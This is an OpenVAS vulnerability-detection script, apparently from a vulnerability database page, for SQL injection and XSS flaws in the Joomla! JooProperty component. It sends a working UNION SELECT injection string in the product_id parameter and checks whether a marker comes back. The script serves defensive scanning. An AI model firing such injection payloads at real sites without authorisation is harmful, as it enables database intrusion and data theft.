Lucene search

K
openvasCopyright (C) 2012 Greenbone AGOPENVAS:1361412562310103622
HistoryDec 12, 2012 - 12:00 a.m.

Joomla! JooProperty Component SQLi and XSS Vulnerabilities

2012-12-1200:00:00
Copyright (C) 2012 Greenbone AG
plugins.openvas.org
10

6.4 Medium

AI Score

Confidence

High

The JooProperty component for Joomla! is prone to an SQL
injection (SQLi) vulnerability and a cross-site scripting (XSS) vulnerability because it fails to
properly sanitize user-supplied input.

# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:joomla:joomla";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103622");
  script_tag(name:"cvss_base", value:"8.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:P/A:N");
  script_version("2024-06-27T05:05:29+0000");

  script_tag(name:"solution_type", value:"WillNotFix");

  script_name("Joomla! JooProperty Component SQLi and XSS Vulnerabilities");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/56885");

  script_tag(name:"last_modification", value:"2024-06-27 05:05:29 +0000 (Thu, 27 Jun 2024)");
  script_tag(name:"creation_date", value:"2012-12-12 12:59:16 +0100 (Wed, 12 Dec 2012)");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_dependencies("joomla_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("joomla/installed");

  script_tag(name:"summary", value:"The JooProperty component for Joomla! is prone to an SQL
  injection (SQLi) vulnerability and a cross-site scripting (XSS) vulnerability because it fails to
  properly sanitize user-supplied input.");

  script_tag(name:"impact", value:"An attacker may leverage these issues to execute arbitrary script
  code in the browser of an unsuspecting user in the context of the affected site. This can allow
  the attacker to steal cookie-based authentication credentials, compromise the application, access
  or modify data, or exploit latent vulnerabilities in the underlying database.");

  script_tag(name:"affected", value:"JooProperty 1.13.0 is vulnerable, other versions may also be
  affected.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year
  since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
  options are to upgrade to a newer release, disable respective features, remove the product or
  replace the product by another one.");

  exit(0);
}

include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");

if(!port = get_app_port(cpe:CPE))exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))exit(0);

ex = '?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%20111111,0x53514c2d496e6a656374696f6e2d54657374+--';
url = dir + '/' + ex;

host = http_host_name(port:port);

req = string("GET ", url, " HTTP/1.1\r\n",
             "Host: ", host,"\r\n\r\n");
result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

if("Location" >< result && "SQL-Injection-Test" >!< result) {

  loc = eregmatch(pattern:"Location: (.*)/\?",string:result);
  if(loc[1]) {

   if("http://" >< loc[1]) {

     _loc = loc[1] - ('http://' + host);
     url = _loc + ex;

     req = string("GET ",url," HTTP/1.1\r\n",
                  "Host: ", host,"\r\n\r\n");
     result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
   }
  }
}

if(result && "SQL-Injection-Test" >< result) {
  security_message(port:port);
  exit(0);
}

exit(0);

6.4 Medium

AI Score

Confidence

High